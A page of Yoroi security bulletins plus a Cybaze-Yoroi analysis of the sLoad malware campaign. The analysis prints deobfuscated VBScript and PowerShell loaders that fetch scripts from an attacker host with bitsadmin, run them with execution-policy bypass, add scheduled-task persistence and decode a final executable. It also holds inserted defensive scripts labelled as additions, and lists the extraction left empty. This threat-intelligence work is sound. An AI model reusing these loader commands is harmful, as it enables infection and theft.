Intensification of R-DoS Threats

Proto: N041019.

Yoroi hereby wishes to inform you of the detection of a recent intensification of attack activity against Organizations and Companies operating in the Financial, Entertainment and Retail sectors, specifically tied to ransom demands backed by the threat of Denial of Service attacks (R-DoS).

Third-party researchers have reported emerging activity by a criminal group that, posing as the well-known APT “Fancy Bear”, threatens to cut off the victims' networks through DoS attacks and demands the payment of a ransom in bitcoin.

Figure. Example of a ransom demand.

The information gathered indicates that the cyber-criminals do in fact possess tools and botnets capable of carrying out Distributed Denial of Service attacks in the order of tens of Gbps. In particular, amplification techniques over UDP protocols are reported in use, such as:

Typically, the criminal group launches its attacks against the internet addresses owned by the Organization, not only against its exposed web services. For this reason Yoroi suggests verifying whether any DDoS protections in use adequately cover the sub-domains and the IT infrastructure in use.

Finally, Yoroi recommends keeping user awareness high by periodically notifying users of ongoing threats, and relying on a team of experts to safeguard the security of the “cyber” perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

“Eurobet” DDoS Attacks

Proto: N031019.

Yoroi hereby wishes to inform you of the recent attack against Eurobet and of the related risks for third-party companies and organizations. The online betting company has been under cyber attack for days. However, in the last few hours some organizations have recorded anomalous traffic peaks originating precisely from Eurobet's networks: peaks tied to malicious or scanning traffic, or in volumes large enough to cause service disruption.

The available information indicates that Eurobet's networks may, in these days, be the victim of abuse and potentially be exploited for malicious purposes by third-party attackers.

Therefore, as a precaution and for a limited period of time, we suggest monitoring and evaluating the volumes of inbound traffic originating from Eurobet's networks and directed at your infrastructure, and arranging or requesting its blocking at your Internet Service Providers should the traffic reach potentially harmful volumes. The Eurobet networks potentially affected by the abuse are listed below:

Finally, Yoroi recommends keeping user awareness high by periodically notifying users of ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index
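The monitoring step recommended in the Eurobet advisory above, written out as an added example (this is not Yoroi's code): flow records are bucketed per watched source prefix and per minute, and only buckets above a byte threshold are reported, so traffic from networks outside the watch list is ignored. The prefixes, the threshold and the flow lines are constructed placeholders (TEST-NET ranges); the networks listed in the advisory are not reproduced here and must be substituted.

```powershell
# Added example, not part of the Yoroi advisory: aggregate inbound bytes per
# watch-listed source prefix, per minute, and report buckets above a threshold.
# All prefixes, the threshold and the flow lines below are constructed.

$WatchedPrefixes = @('203.0.113.0/24', '198.51.100.0/25')  # constructed placeholders for the advisory's networks
$ThresholdBytesPerMinute = 50MB                              # constructed threshold, tune to the link size

# Constructed flow records: UTC timestamp, source IP, destination IP, bytes
$SampleFlows = @'
2019-10-03T10:00:12Z 203.0.113.45 192.0.2.10 41943040
2019-10-03T10:00:30Z 203.0.113.77 192.0.2.10 20971520
2019-10-03T10:00:41Z 198.51.100.9 192.0.2.20 1048576
2019-10-03T10:01:05Z 203.0.113.45 192.0.2.10 5242880
2019-10-03T10:01:08Z 192.0.2.99 192.0.2.10 104857600
'@

function ConvertTo-AddressNumber {
    # IPv4 dotted quad -> integer, kept as Int64 so the bitwise operations never overflow
    param([string]$Ip)
    $bytes = [System.Net.IPAddress]::Parse($Ip).GetAddressBytes()
    return ([int64]$bytes[0] -shl 24) -bor ([int64]$bytes[1] -shl 16) -bor ([int64]$bytes[2] -shl 8) -bor [int64]$bytes[3]
}

function Test-InPrefix {
    param([string]$Ip, [string]$Cidr)
    $network, $length = $Cidr -split '/'
    $length = [int]$length
    # mask with the top $length bits set, e.g. /24 -> 0xFFFFFF00
    $mask = ([int64]1 -shl 32) - ([int64]1 -shl (32 - $length))
    return ((ConvertTo-AddressNumber $Ip) -band $mask) -eq ((ConvertTo-AddressNumber $network) -band $mask)
}

function Get-WatchedTrafficAlerts {
    param([string]$FlowText, [string[]]$Prefixes, [long]$Threshold)
    $buckets = @{}
    foreach ($line in ($FlowText -split "`n")) {
        $line = $line.Trim()
        if (-not $line) { continue }
        $timestamp, $source, $destination, $bytes = $line -split '\s+'
        $prefix = $Prefixes | Where-Object { Test-InPrefix -Ip $source -Cidr $_ } | Select-Object -First 1
        if (-not $prefix) { continue }          # source is not in a watched network
        $minute = $timestamp.Substring(0, 16)   # 'yyyy-MM-ddTHH:mm' of the constructed timestamp format
        $key = "$prefix|$minute"
        if (-not $buckets.ContainsKey($key)) { $buckets[$key] = [long]0 }
        $buckets[$key] += [long]$bytes
    }
    foreach ($key in $buckets.Keys) {
        if ($buckets[$key] -ge $Threshold) {
            $prefix, $minute = $key -split '\|'
            [pscustomobject]@{ Prefix = $prefix; Minute = $minute; Bytes = $buckets[$key] }
        }
    }
}

Get-WatchedTrafficAlerts -FlowText $SampleFlows -Prefixes $WatchedPrefixes -Threshold $ThresholdBytesPerMinute |
    Format-Table -AutoSize
```

On the constructed input only the 203.0.113.0/24 bucket for 10:00 (60 MB over two flows) is reported; the 100 MB flow from 192.0.2.99 is not, because it does not come from a watched network. Feeding real flow exports is a matter of adapting the line split and the timestamp slice to the exporter's format.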

VPN Gateways Under Attack

Proto: N021019.

Yoroi hereby wishes to inform you of the discovery of ongoing attack operations aimed at compromising Organizations worldwide. The attacks, observed by the UK National Cyber Security Centre (NCSC), are carried out by advanced threat actors and exploit serious vulnerabilities in Firewalls and VPN Gateways produced by Pulse Connect Secure, Fortinet and Palo Alto. Furthermore, part of the code used to attack these vulnerabilities has been publicly released.

The main vulnerabilities exploited during the attack operations are:

In past months the Vendors released security bulletins addressing these issues, for example SA44101 from Pulse Secure, PAN-SA-2019-0020 from Palo Alto and FG-IR-18-384 from Fortigate (ref. EW N030719, N010919).

Therefore, Yoroi recommends verifying the patch status of any potentially affected gateways in use within your organizations; where the security patches are not installed, Yoroi suggests considering an investigation of the devices' logs to rule out any ongoing compromise.

Finally, Yoroi recommends keeping user awareness high by periodically notifying users of ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

The sLoad Threat: Ten Months Later

Introduction

SLoad (TH-163) has been the protagonist of increasing and persistent attack waves against the Italian landscape since Q3 2018 and on into 2019 (e.g. N020419, N040619, N010819), and also against the UK and Canada, as reported by Proofpoint. Ten months ago we wrote about the complex infection chain the sLoad malware threat was using in its attack campaigns; today we look at the evolution of the threat by dissecting one of its latest attacks.

During our CSDC monitoring operations, we recently noticed some changes in the infamous attack waves related to sLoad, which is known for adopting a complex infection chain to spread additional malware. For this reason Cybaze-Yoroi ZLAB dissected one of the latest ones.

Technical Analysis

According to CERT-PA investigations, the malware has recently been delivered using legitimate certified emails (PEC). These recent attack waves were targeting Italian Organizations and consultants affiliated with professional associations, such as lawyers and civil engineers. Once again the attachment is a malicious zip.

Figure 1: Example of mail (source: CERT-PA)

The Infection Chain

Figure 2: Files contained in attachment file zip

This time the zip does not hide powershell code, such as the code appended to the archive recovered in past waves. The archive contains two files: a corrupted PDF file and a VBScript. The first one is designed to deceive the unaware user and push him to open the runnable script.

The following tables show some basic information about the samples contained in the zip archive.

Hash: 30d6f6470e145a1d1f2083abc443148c8e3f762025ca262267ae2e531b2e8ab4
Threat: .vbs dropper
Brief Description: Sload visual basic script loader
Ssdeep: 192:Fb1TpsF8Z1mZcwfD0VCmA7VETYM/2IVKfCH:FbQjZZfDsA7G2zfCH

Table 1: Information about SLoad .vbs dropper

Hash: 43db5fcb75d50a5516b687b076be5eb1aaec4b51d8d61a60efc69b383c1d757c
Threat: .pdf file
Brief Description: Sload corrupted pdf file
Ssdeep: 1536:mmD8g29U+A092Ljr/N0VyvD/ABVqYA7hq4XoZxXjdY4u/dQV:FdLKQjrFgyvsB0YA1q4YZxpWQV

Table 2: Information about SLoad .pdf file

Opening the vbs dropper, it is possible to see an obfuscated script containing several junk instructions such as unused variables and commented code. After a deobfuscation phase the inner logic becomes visible. The purpose of this script is to launch a powershell script retrieved from the attacker's infrastructure and, in the meantime, decoy the victim.

On Error Resume Next
Set ZCzG   = CreateObject("Scripting.FileSystemObject")
Set PavfQt = WScript.CreateObject ("WScript.Shell")
Set XaiX = ZCzG.GetFolder("c:\Users\")
Recurse(XaiX)
PavfQt.run "bitsadmin /transfer OkFCVS /download /priority FOREGROUND https://dreamacinc.com/UCP9dATGyt6mJ/srdzHcN4bWUum.jpg c:\Users\Public\Downloads\RSbYHuPO.ps1",0,True
i=0
Do While i < 1
    If (ZCzG.FileExists("c:\Users\Public\Downloads\RSbYHuPO.ps1")) Then
        i=1
    End If
    WScript.Sleep(2280)
Loop
PavfQt.run "powershell.exe -ep bypass -file c:/users/public/downloads/RSbYHuPO.ps1 ",0,True
Sub Recurse(JFLY)
    If IsAccessible(JFLY) Then
        For Each oSubFolder In JFLY.SubFolders
            Recurse oSubFolder
        Next
        For Each RIst In JFLY.Files
            If InStr(RIst.Name,".pdf") > 0 Then
                PavfQt.run "explorer "+JFLY+"\"+RIst.Name
            End if
        Next
    End If
End Sub
Function IsAccessible(XaiX)
    On Error Resume Next
    IsAccessible = (XaiX.SubFolders.Count >= 0)
End Function

Code snippet 1: Deobfuscated vbs dropper

The malware downloads a fake jpg using the “bitsadmin.exe” tool from “hxxps://dreamacinc[.com/UCP9dATGyt6mJ/srdzHcN4bWUum[.jpg”. The usage of native tools allows the script to operate under the radar, avoiding several AV controls. The fake jpg actually contains a powershell script.

$oLZz2= "C:\Users\admin\AppData\Roaming";
$key=@(1..16);   # the variable name was lost in extraction; "$key" is a placeholder

[...]

$main_ini='76492d1116743f0423413b16050a5345MgB8ADUAVAB4   [...]   AMQAyAGYA';
$main_ini | out-file $PaIQGLoo'\main.ini';

$domain_ini='76492d1116743f0423413b1605   [...]   YwBlAA==';
$domain_ini | out-file $PaIQGLoo'\domain.ini';

[...]

try{ [...]
}catch{$yC0iBerAupzdtf5Z=Get-Process -name powershell*;
    if ($yC0iBerAupzdtf5Z.length -lt 2){
        $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
        $r=8;
        $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
        $zjGQzSypyGPthusR = $047MydhkAAfp1W+"\"+$B3xcDMBF;
        $sv8eJJhgWV3xAN7Uu=@(1..16);
        $umwTVcIoudRlXjR6yAQQ= Get-Content "main.ini"
        $MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
        $AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
        $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
        Invoke-Expression $DBR4S3t;
    }
} | out-file $PaIQGLoo'\'$H3z9RnzIihO8'.ps1'

$OFHc0H4A=' /F /create /sc minute /mo 3 /TN "S'+$rs+$fLCg9ngJqRHX36hfUr+'" /ST 07:00 /TR "wscript /E:vbscript '+$PaIQGLoo+'\'+$JxdRWnHC+'.tmp"';
start-process -windowstyle hidden schtasks $OFHc0H4A;   [...]

Code snippet 2: Downloaded powershell code

The first action the script does is to set a scheduled task to gain persistence on the infected machine. Then, after selecting a random active process on the infected machine (“System” in this specific infection) and concatenating its name with the “%AppData%\Roaming” path, it stores four different files in its installation folder.

All of them are embedded in the script; furthermore, two of them (“domain.ini” and “main.ini”) are encrypted using the “ConvertFrom-SecureString” native function. Then the script runs the “UoqOTQrc.tmp” file, whose only purpose is to execute the “UoqOTQrc.ps1” file contained in the same folder.
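An added triage script for the persistence described above (this is not the authors' code). It flags scheduled-task actions that run wscript in forced VBScript mode (/E:vbscript) on a ".tmp" file under the roaming profile, as the schtasks command in the dropper does, and lists the contents of a drop folder named after the first 6 or 8 characters of the system UUID, the two prefix lengths used by the samples in this write-up. The function names are mine; the live checks assume the ScheduledTasks module (Windows 8 / Server 2012 and later) and the self-check uses the command line from the deobfuscated x2401.jpg script.

```powershell
# Added triage example, not part of the Cybaze-Yoroi write-up.

function Test-SuspiciousVbsTaskAction {
    # True when a task action runs wscript with /E:vbscript on a .tmp file under %AppData%\Roaming
    param([string]$Execute, [string]$Arguments)
    $cmd = "$Execute $Arguments"
    return ($cmd -match '(?i)wscript(\.exe)?\s') -and
           ($cmd -match '(?i)/E:vbscript') -and
           ($cmd -match '(?i)\\AppData\\Roaming\\[^\\"]+\\[^\\"]+\.tmp')
}

function Get-SuspiciousVbsTasks {
    # Live check over the registered scheduled tasks (requires the ScheduledTasks module)
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (Test-SuspiciousVbsTaskAction -Execute $action.Execute -Arguments $action.Arguments) {
                [pscustomobject]@{
                    TaskName  = $task.TaskName
                    TaskPath  = $task.TaskPath
                    Execute   = $action.Execute
                    Arguments = $action.Arguments
                }
            }
        }
    }
}

function Get-UuidPrefixedDropFolders {
    # The samples name the drop folder after the first 6 or 8 characters of the system UUID
    $uuid = (Get-WmiObject Win32_ComputerSystemProduct).UUID
    $roaming = [Environment]::GetFolderPath('ApplicationData')   # %AppData%\Roaming
    foreach ($length in @(6, 8)) {
        $candidate = Join-Path $roaming $uuid.Substring(0, $length)
        if (Test-Path $candidate) {
            Get-ChildItem -Path $candidate -Force |
                Where-Object { $_.Extension -in @('.tmp', '.ps1', '.ini', '.log') } |
                Select-Object FullName, Length, LastWriteTime
        }
    }
}

# Constructed self-check using the task command line shown in the deobfuscated x2401.jpg script
$constructedArgs = '/E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp'
if (-not (Test-SuspiciousVbsTaskAction -Execute 'wscript' -Arguments $constructedArgs)) {
    throw 'detector self-check failed'
}
# A plain .vbs logon script must not be flagged
if (Test-SuspiciousVbsTaskAction -Execute 'wscript.exe' -Arguments 'C:\Scripts\inventory.vbs') {
    throw 'false positive on a benign task'
}

# Live triage on the current host
Get-SuspiciousVbsTasks | Format-Table -AutoSize
Get-UuidPrefixedDropFolders | Format-Table -AutoSize
```

The action test keys on the combination (wscript, /E:vbscript, a ".tmp" target under the roaming profile) rather than on the random task and file names, which change between infections; the folder check is host-specific because the name is derived from that machine's UUID.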

Figure 3: Files created in “%AppData%\Roaming\<active_process>\”

Dim str, min, max
Const LETTERS = "abcdefghijklmnopqrstuvwxyz"
min = 1
max = Len(LETTERS)
Randomize

[...]

Set objFSO=CreateObject("Scripting.FileSystemObject")
Set winssh = WScript.CreateObject ("WScript.Shell")
fName=RandomString(10)
JAcalshy=RandomString(4)
fZgxNPDMnu=RandomString(4)
WEHxctVdTEoDfqEqJMP=RandomString(4)

[...]

Set objFile = objFSO.CreateTextFile(outFile,8, True)
objFile.Write "Set "+JAcalshy+"=rshe" & vbCrLf
objFile.Write "Set "+fZgxNPDMnu+"=ypa" & vbCrLf
objFile.Write "Set "+WEHxctVdTEoDfqEqJMP+"=il" & vbCrLf
objFile.Close
winssh.run "powershell -ep bypass -file .ps1",0,true

Code snippet 3: content of “UoqOTQrc.tmp” file.

try{
      Remove-EventLog:Debug-Job
      Export-BinaryMiLog:Get-PSSessionConfiguration
      Remove-JobTrigger:New-Item
}catch{
    $yC0iBerAupzdtf5Z=Get-Process -name powershell*;
    if ($yC0iBerAupzdtf5Z.length -lt 2){
        $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;$r=8;
        $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
        $zjGQzSypyGPthusR = $047MydhkAAfp1W+"\"+$B3xcDMBF;
        $sv8eJJhgWV3xAN7Uu=@(1..16);
        $umwTVcIoudRlXjR6yAQQ= Get-Content "main.ini"
        $MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
        $AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
        $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
        Invoke-Expression $DBR4S3t;
    }
}

Code snippet 4: content of “UoqOTQrc.ps1” file.

In the same way, the “UoqOTQrc” script decrypts the “main.ini” file using the “ConvertTo-SecureString” function (the inverse of the “ConvertFrom-SecureString” call that encrypted it) and the encryption key contained in the “$sv8eJJhgWV3xAN7Uu” variable, a sequential integer array.
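The decryption step just described, as an added example for analysts (this is not the authors' code): a blob produced by ConvertFrom-SecureString with the key @(1..16) is turned back into plain text with ConvertTo-SecureString and the Marshal BSTR helpers, exactly the calls the sLoad script uses, but without executing the result. Because no real main.ini content is reproduced on the page, the block protects a constructed string the same way and recovers it; the function names are mine, and a real “main.ini” or “domain.ini” from a case goes through Unprotect-SLoadIniFile with the same key.

```powershell
# Added example, not part of the Cybaze-Yoroi write-up: recover the plain text of an
# .ini blob protected with ConvertFrom-SecureString -Key, using the key @(1..16).

$SLoadKey = [byte[]](1..16)   # the sequential integer array used by the samples

function Unprotect-SecureStringBlob {
    param([Parameter(Mandatory)][string]$Blob, [byte[]]$Key = $SLoadKey)
    # The blob is the hex-prefixed string emitted by ConvertFrom-SecureString -Key;
    # a key that does not match fails here with a padding error instead of returning garbage.
    $secure = ConvertTo-SecureString -String $Blob.Trim() -Key $Key
    $bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secure)
    try {
        return [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr)
    } finally {
        [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr)
    }
}

function Unprotect-SLoadIniFile {
    # Decrypt a dropped main.ini / domain.ini / config.ini / web.ini without running it
    param([Parameter(Mandatory)][string]$Path, [byte[]]$Key = $SLoadKey)
    Unprotect-SecureStringBlob -Blob (Get-Content -Path $Path -Raw) -Key $Key
}

# Constructed round trip: protect a harmless stand-in the way the dropper does, then recover it
$constructedPlain = '# constructed stand-in for main.ini, not real sLoad content'
$constructedBlob  = ConvertTo-SecureString -String $constructedPlain -AsPlainText -Force |
                    ConvertFrom-SecureString -Key $SLoadKey
$recovered = Unprotect-SecureStringBlob -Blob $constructedBlob
if ($recovered -ne $constructedPlain) { throw 'round trip failed' }

# The blob starts with the same 32-character header that opens the encrypted samples above
$constructedBlob.Substring(0, 32)
```

Analysts usually want the decrypted script written to a file for reading rather than passed to Invoke-Expression, which is the one difference between this block and the malware's own catch branch.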

Figure 4: “main.ini” file before and after decryption

The decrypted “main.ini” script tries to ping a URL generated by selecting three ascii char-codes in the ranges [65-90] and [67-122]. Then it decrypts “domain.ini” using the key in the “$main_key” variable. In the end, it saves the results in the “btc.log” file. Continuing the analysis of “main.ini”, it is possible to spot that the script also grabs system information to check in the newly infected host.

Figure 5: “domain.ini” file before and after decryption

Figure 6: Some information exfiltrated by the malware, before and after base64 decoding

At this point, another malicious file is downloaded. The malware retrieves it from “hxxps://<C2_URL>/doc/x2401.jpg”. Once again, this is not a real jpg, but rather another obfuscated powershell layer.

$u2K2MQ4 = "`r`n"
$lNlNrKyk= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
$yIXgWSaXsKD5hanf9uO= $env:userprofile+'\App'+'Da'+'ta\Ro'+'am'+'ing';
$hh='hi'+'dd'+'en';
$ixXApGeqJKEGY=@(1..16);
$Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
$Erlydj = $Erlydjiyy.UUID;
$sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
$Z5lTNXB = $yIXgWSaXsKD5hanf9uO+"\"+$sOmUGoc0ysV8UW;
If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}

If(test-path $Z5lTNXB"\_in"){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB"\_in";$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; "1" | out-file $Z5lTNXB"\_in";

try{ Remove-Item $Z5lTNXB'\*'}catch{}

$wsxDITPgQCH+='76492d1116743f0423413b16050a5345MgB8AGsAKwBwAHkASQBUAGgAWgBKAEsAbgBFAE8AUQBHA';
[...]
$wsxDITPgQCH+='UAZAA1AGIAZAA0ADIAYgBkAGUANQAzADIAYgBkAGIAMwBlADMAZQA1ADAAOQA3ADgAYwAyAGYAMgA';
$wsxDITPgQCH+='3ADAANQA1AA==';
$wsxDITPgQCH | out-file $Z5lTNXB'\config.ini';
$5r8DcJB4ok4+='76492d1116743f0423413b16050a5345MgB8AHQAYgBqAFYAVQBQADUAQwBNAGEAZABWAFMA';
[...]
$5r8DcJB4ok4+='YQBiADUAOAAzAGQANAAxADgAMwAxAGYANQAwAGIA';
$5r8DcJB4ok4 | out-file $Z5lTNXB'\web.ini';
start-process -windowstyle $hh schtasks '/change /tn GoFast /disable';
$2aWxu9dutZfOPCCgS+=$u2K2MQ4+'Dim  ';
[...]
$nz0oninX6=$ixXApGeqJKEGY -join ',';
$E6M6Np8nhXnu4ndPEJ=' /F /create /sc minute /mo 3 /TN "U'+$sOmUGoc0ysV8UW+'" /ST 07:00 /TR "wscript /E:vbscript '+$Z5lTNXB+'\'+$lNlNrKyk+'.tmp"';
start-process -windowstyle $hh schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 5: Obfuscated content of “x2401.jpg” file.

$u2K2MQ4 = "rn";
$lNlNrKyk= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_});
$yIXgWSaXsKD5hanf9uO= $env:userprofile+'\AppData\Roaming';

$Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
$Erlydj = $Erlydjiyy.UUID;
$sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
$Z5lTNXB = $yIXgWSaXsKD5hanf9uO+"\"+$sOmUGoc0ysV8UW;
If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}

If(test-path $Z5lTNXB"\_in"){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB"\_in";$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; "1" | out-file $Z5lTNXB"\_in";

try{ Remove-Item $Z5lTNXB'\*'}catch{}
$wsxDITPgQCH="76492d1 [...] A1AA==";
$wsxDITPgQCH | out-file $Z5lTNXB'\config.ini';

$5r8DcJB4ok4="7649 [...] AGIA";
$5r8DcJB4ok4 | out-file $Z5lTNXB'\web.ini';

start-process -windowstyle hidden schtasks '/change /tn GoFast /disable';

$2aWxu9dutZfOPCCgS="Dim  winssh [...] winssh.run "powershell -ep bypass -file vJjFwtSM.ps1",0,true";
$2aWxu9dutZfOPCCgS | out-file $Z5lTNXB'\'$lNlNrKyk'.tmp'

$r1uIiPZBhUea0=" $zTxePJtpmbVI0btT6cd9=Get-Process -name powershell*; [...] Invoke-Expression $NLO3lwvn1xWn;}";
$r1uIiPZBhUea0 | out-file $Z5lTNXB'\'$lNlNrKyk'.ps1'

$nz0oninX6="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16";
$E6M6Np8nhXnu4ndPEJ="/F /create /sc minute /mo 3 /TN "U52A34D" /ST 07:00 /TR "wscript /E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp";

start-process -windowstyle hidden schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 6: Deobfuscated content of “x2401.jpg” file.

Like the previous script, this one performs the same operations and creates four other files in the “%AppData%\Roaming\<active_process>” path. This time the files are:

Figure 7: Files created in “%AppData%\Roaming\<active_process>\”

The first executed file is “<random_name>.tmp”. It is not obfuscated and its only purpose is the execution of “<random_name>.ps1”. The content of the “<random_name>.ps1” file is the following. This latter script decrypts the content of the “config.ini” file. The following figure shows both the encrypted and the decrypted “config.ini” file.

Figure 8: Files created in “%AppData%\Roaming\<active_process>\”

This script performs the same operations described for the “main.ini” file but uses different URLs stored in the “web.ini” file. This time too, the file is decrypted using an integer array from 1 to 16 as the key, contained in the “$mainKey” variable.

Figure 9: “web.ini” file before and after decryption

Finally, it tries to download the final payload with the following piece of script. However, at the time of analysis all the C2 URLs seemed to be down, so we were not able to determine the final payload family.

$dPath = [Environment]::GetFolderPath("MyDocuments")
$jerry=$starsLord+'\'+$roccon+'_'+$rp;
$clpsr='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND '+$line+' '+$jerry+'.txt & Copy /Z '+$jerry+'.txt '+$jerry+'_1.txt & certutil -decode '+$jerry+'_1.txt '+$dPath+'\'+$roccon+'_'+$rp+'.exe & powershell -command "start-process '+$dPath+'\'+$roccon+'_'+$rp+'.exe" & exit';
start-process -wiNdowStylE HiddeN $mainDMC $clpsr;
$clpsr='/C del '+$jerry+'.txt & del '+$jerry+'_1.txt & del '+$dPath+'\'+$roccon+'_'+$rp+'.exe & exit';
start-process -wiNdowStylE HiddeN $mainDMC $clpsr;

Code snippet 7: script to download the final payload

Comparison With Previous Chains

To better understand the evolution of the sLoad infection chain, we compared the attack attempts observed since 2018 with the latest ones. In both cases, the infection vector is a carefully themed malicious email weaponized with a zip archive containing two files. In the first case the starting point is a “.lnk” file; in the second one the chain starts with a “.vbs” script.

The sLoad attack chain observed months ago was characterized by pieces of powershell code appended to the tail of the zip archive. Probably this technique became more detectable over time, so it may have been abandoned in the latest infection attempts. For both malware variants, the archive contains a legitimate image (or pdf) used to deceive the unaware user. Moreover, in the first analyzed variant the core of the infection is mainly based on powershell scripts and LOLbins, whereas the latest stages use a mix of Powershell and Visual Basic Scripts.

Figure 10: Infection chain workflow

The agent body is still quite similar in its core structure; however, the bot now supports new commands such as “Exec” and “Eval”, the latter being able to download further code through the Bitsadmin utility instead of relying directly on the “Net.WebClient” primitive. Also, the “ScreenCapture” function has been removed from the new version of the code, in favor of enhancing the agent's persistence through scheduled tasks.

Figure 11: Comparison between the old and new version of the “config.ini” file

Conclusion

sLoad keeps evolving its TTPs and represents a vivid threat for the Italian cyber landscape. Also, many times, especially during the last months, its activities in the country have involved the abuse of certified mailboxes (PEC), targeting associated professionals and consultants along with private companies. Additionally, the quality of the latest phishing emails is high: the group adopted templates and naming conventions actually in use by the Italian Revenue Agency (“Agenzia delle Entrate”).

The plentiful usage of LOLbins, Powershell scripts and SSL-encrypted channels makes detection of this threat difficult for automated systems, and frequently requires analyst skills or high-quality threat intelligence sources to detect and tackle sLoad attack campaigns, which many times target just a single country.

Indicators of Compromise

Yara Rules

rule SLoad_Sep_2019 {
    meta:
        description = "Yara Rule for Sload campaign 2019"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019-09-27"
        tlp = "white"
        category = "informational"

    strings:
        $s1 = {50 4B}
        $s2 = {29 7B 0A 33 9D B6 C7 BF}
        $s3 = {E7 D5 53 78 3A BD}
        $a1 = "IT83440018268.vbs" ascii wide
        $a2 = "IT83440018268.pdf" ascii wide

    condition:
        all of ($s*) and 1 of ($a*)
}

rule sload_Sep_2019 {
    meta:
        description = "Yara Rule for Sload vbs script sept 2019"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019-09-27"
        tlp = "white"
        category = "informational"

    strings:
        $s1 = "ZCzG.GetFolder(\"c:\\Users\\\")"
        $s2 = "WScript.Shell"
        $s3 = "https://dreamacinc.com/"
        $s4 = "bitsadmin"

    condition:
        all of them
}

This blog post was authored by Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB

Emotet+Ursnif Attack Campaign

Proto: N011019.

Yoroi hereby wishes to inform you of the discovery of a dangerous attack campaign under way against Italian users and Companies. The fraudulent email messages invite the victims to open documents capable of downloading and executing an implant of the Emotet family (TH-168). Following the infection, the installation of further malware of the Ursnif family has also been observed: a threat capable of intercepting keystrokes, stealing saved passwords and altering the user's web browsing.

Figure. Example of a malicious document

The indicators of compromise identified during the analyses are listed below:

Finally, Yoroi recommends keeping user awareness high by periodically notifying users of ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index